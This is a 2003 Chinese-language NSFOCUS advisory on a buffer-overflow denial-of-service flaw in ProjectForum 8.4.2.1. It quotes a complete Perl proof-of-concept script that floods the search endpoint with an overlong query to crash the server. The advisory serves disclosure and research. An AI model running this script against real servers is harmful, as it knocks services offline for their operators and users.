NSFOCUS绿盟科技

首页 -> 安全研究

安全研究

安全漏洞

ProjectForum find请求远程拒绝服务攻击漏洞

发布日期：2003-12-22
更新日期：2003-12-29

受影响系统：

CourseForum Technologies ProjectForum 8.4.2.1

描述：

BUGTRAQ  ID: 9271

ProjectForum是一款基于WEB的项目管理论坛程序。

ProjectForum不正确处理超长'find'请求，远程攻击者可以利用这个漏洞对服务程序进行拒绝服务攻击。

通过提交超长的'find'请求字符串，可使应用程序发生缓冲区溢出，精心构建字符串数据可能以WEB进程权限在系统上执行任意指令。

<*来源：Peter Winter-Smith

  链接：http://marc.theaimsgroup.com/?l=bugtraq&m=107213577015186&w=2
*>

测试方法：

警告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

Peter Winter-Smith 提供了如下测试方法：

#!/usr/bin/perl -w

############################################################
#                                                          #
# ProjectForum 8.4.2.1 and below DoS Proof of Concept Code #
#  by Peter Winter-Smith [peter4020@hotmail.com]           #
#                                                          #
############################################################

use IO::Socket;

if(!($ARGV[1]))
{
print "\nUsage: pfdos.pl <victim> <port>\n" .
     "\tdefault port is 3455\n\n";
exit;
}

$victim = IO::Socket::INET->new(Proto=>'tcp',
                              PeerAddr=>$ARGV[0],
                              PeerPort=>$ARGV[1])
                          or die "Unable to connect to $ARGV[0] " .
                                 "on port $ARGV[1]";

$DoSpacket = '' .
'POST /1/Search HTTP/1.1' . "\x0d\x0a" .
'Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, ' .
'application/x-gsarcade-launch, application/vnd.ms-excel, ' .
'application/vnd.ms-powerpoint, application/msword, ' .
'application/x-shockwave-flash, */*' . "\x0d\x0a" .
'Referer: http://localhost:3455/1/Search' . "\x0d\x0a" .
'Accept-Language: en-gb..Content-Type: application/x-www-form-' .
'urlencoded' . "\x0d\x0a" .
'Accept-Encoding: gzip, deflate' . "\x0d\x0a" .
'User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; ' .
'xxxxxxxxxxxxx' . "\x20" .
'1.0.5; .NET CLR 1.0.3705; .NET CLR 1.1.4322)' . "\x0d\x0a" .
'Host: localhost:3455' . "\x0d\x0a" .
'Content-Length: 6306' . "\x0d\x0a" .
'Connection: Keep-Alive' . "\x0d\x0a" .
'Cache-Control: no-cache' . "\x0d\x0a" . "\x0d\x0a" .
'q=' . 'a'x6292 . '&action=Find' . "\x0d\x0a";

print $victim $DoSpacket;

print " + Making Request ...\n + Server should be dead!!\n";

sleep(4);
close($victim);

print "Done.\n";
exit;

建议：

厂商补丁：

CourseForum Technologies
------------------------
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：

http://www.projectforum.com/projectforum/

浏览次数：2851
严重程度：0（网友投票）

关于我们: 公司介绍; 公司荣誉; 公司新闻

联系我们: 公司总部; 分支机构; 海外机构

快速链接: 绿盟云; 绿盟威胁情报中心NTI; 技术博客